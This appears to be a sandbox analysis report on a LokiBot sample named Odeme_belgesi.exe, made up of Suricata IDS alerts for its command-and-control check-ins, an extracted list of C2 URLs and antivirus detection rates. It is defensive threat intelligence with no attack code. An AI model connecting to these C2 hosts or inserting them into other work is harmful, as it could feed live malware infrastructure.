2024-10-01T10:56:57.296632+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:58.123183+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:59.239027+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.235929+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.169312+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49844	45.66.231.242	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:54:59.017244+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.929584+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.838931+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.734897+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.791909+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.714856+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.689995+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.539446+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.431407+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.290926+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.156783+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:14.059014+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:15.181877+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:16.001641+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:17.057243+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.935914+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.808725+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.700322+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.622010+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:24.716379+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.534367+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.361457+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.260785+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:28.111446+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.997001+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.807741+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.730772+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.541452+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.344919+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.286078+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:34.118881+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.933166+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.839128+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.706651+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.524416+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.374178+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.385441+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.328121+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.381303+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.421721+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.589678+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.464644+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.292929+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:49.348506+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.343657+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:51.144817+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:52.156456+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.192942+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.988611+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.958720+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.793611+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.591640+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.452108+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:58.764642+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.680645+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.513321+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.439429+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.353855+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.182284+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.911144+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.813722+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.707475+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.758460+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.789425+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.729047+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.932407+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.914707+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.790640+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.717307+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.548372+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.403711+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.360698+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.244487+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:33.078751+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:34.264055+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:35.118822+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:36.007121+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:37.076989+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.993838+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.817577+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.675484+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.543640+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.469900+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.355681+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.346923+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.250217+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:45.124436+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:46.001925+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.932311+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.715173+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.656357+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.497277+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.315483+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:51.139744+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:52.030835+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.933070+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.939406+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.751235+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.562073+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.353977+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.296632+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:58.123183+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:59.239027+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.235929+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.169312+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49844	45.66.231.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://solutviewmen.viewdns.net/bdifygidj/five/fre.php"]}

Multi AV Scanner detection for domain / URL

Source: solutviewmen.viewdns.net	Virustotal: Detection: 5%	Perma Link
Source: http://alphastand.trade/alien/fre.php	Virustotal: Detection: 13%	Perma Link
Source: http://kbfvzoboss.bid/alien/fre.php	Virustotal: Detection: 12%	Perma Link
Source: http://alphastand.win/alien/fre.php	Virustotal: Detection: 12%	Perma Link
Source: http://alphastand.top/alien/fre.php	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Odeme_belgesi.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Odeme_belgesi.exe

Joe Sandbox ML: detected

Source: Odeme_belgesi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Odeme_belgesi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Odeme_belgesi.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49790 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49801 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49807 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49807 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49807 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49790 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49790 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49807 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49807 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49790 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49790 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49825 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49790
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49801 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49777 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 45.66.231.242:80
